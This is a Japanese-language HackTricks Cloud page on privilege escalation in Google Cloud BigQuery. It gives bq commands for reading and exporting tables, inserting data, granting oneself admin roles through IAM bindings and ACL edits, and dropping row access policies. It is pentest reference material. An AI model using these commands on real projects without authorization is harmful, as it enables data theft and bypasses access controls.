GCP - BigQuery Privesc
Reading time: 6 minutes
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
BigQuery
BigQueryに関する詳細情報は、以下を確認してください:
Read Table
BigQueryテーブルに保存されている情報を読み取ることで、sensitive informationを見つけることができるかもしれません。情報にアクセスするために必要な権限は**bigquery.tables.get
、bigquery.jobs.create
、およびbigquery.tables.getData
**です:
bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'
データのエクスポート
これはデータにアクセスする別の方法です。クラウドストレージバケットにエクスポートし、情報を含むファイルをダウンロードします。
このアクションを実行するには、次の権限が必要です: bigquery.tables.export
、bigquery.jobs.create
、および storage.objects.create
。
bq extract <dataset>.<table> "gs://<bucket>/table*.csv"
データの挿入
信頼できる特定のデータを Bigquery テーブルに挿入することが可能かもしれません。 これは、bigquery.tables.get
、bigquery.tables.updateData
、および bigquery.jobs.create
の権限を使用して簡単に行うことができます:
# Via query
bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset>.<table-name>` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'
# Via insert param
bq insert dataset.table /tmp/mydata.json
bigquery.datasets.setIamPolicy
攻撃者はこの権限を悪用して、BigQueryデータセットに対してさらなる権限を与えることができます:
# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>
# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy
bigquery.datasets.update
, (bigquery.datasets.get
)
この権限だけで、ACLを変更することによってBigQueryデータセットへのアクセスを更新することができます。
# Download current permissions, reqires bigquery.datasets.get
bq show --format=prettyjson <proj>:<dataset> > acl.json
## Give permissions to the desired user
bq update --source acl.json <proj>:<dataset>
## Read it with
bq head $PROJECT_ID:<dataset>.<table>
bigquery.tables.setIamPolicy
攻撃者はこの権限を悪用して、BigQueryテーブルに対してさらなる権限を与えることができます:
# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>.<table>
# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy
bigquery.rowAccessPolicies.update
, bigquery.rowAccessPolicies.setIamPolicy
, bigquery.tables.getData
, bigquery.jobs.create
ドキュメントによると、指定された権限を使用すると行ポリシーを更新することが可能です。
しかし、CLI bq
を使用する場合、いくつか追加の権限が必要です: bigquery.rowAccessPolicies.create
、bigquery.tables.get
。
bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used
行ポリシー列挙の出力にフィルターIDを見つけることができます。例:
bq ls --row_access_policies <proj>:<dataset>.<table>
Id Filter Predicate Grantees Creation Time Last Modified Time
------------- ------------------ ----------------------------- ----------------- --------------------
apac_filter term = "Cfba" user:asd@hacktricks.xyz 21 Jan 23:32:09 21 Jan 23:32:09
もし bigquery.rowAccessPolicies.delete
が bigquery.rowAccessPolicies.update
の代わりにあれば、ポリシーを削除することもできます:
# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'
# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'
caution
行アクセスポリシーを回避する別の潜在的なオプションは、制限されたデータの値を変更することです。term
がCfba
のときにのみ見ることができる場合、テーブルのすべてのレコードをterm = "Cfba"
に変更します。しかし、これはbigqueryによって防止されています。
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。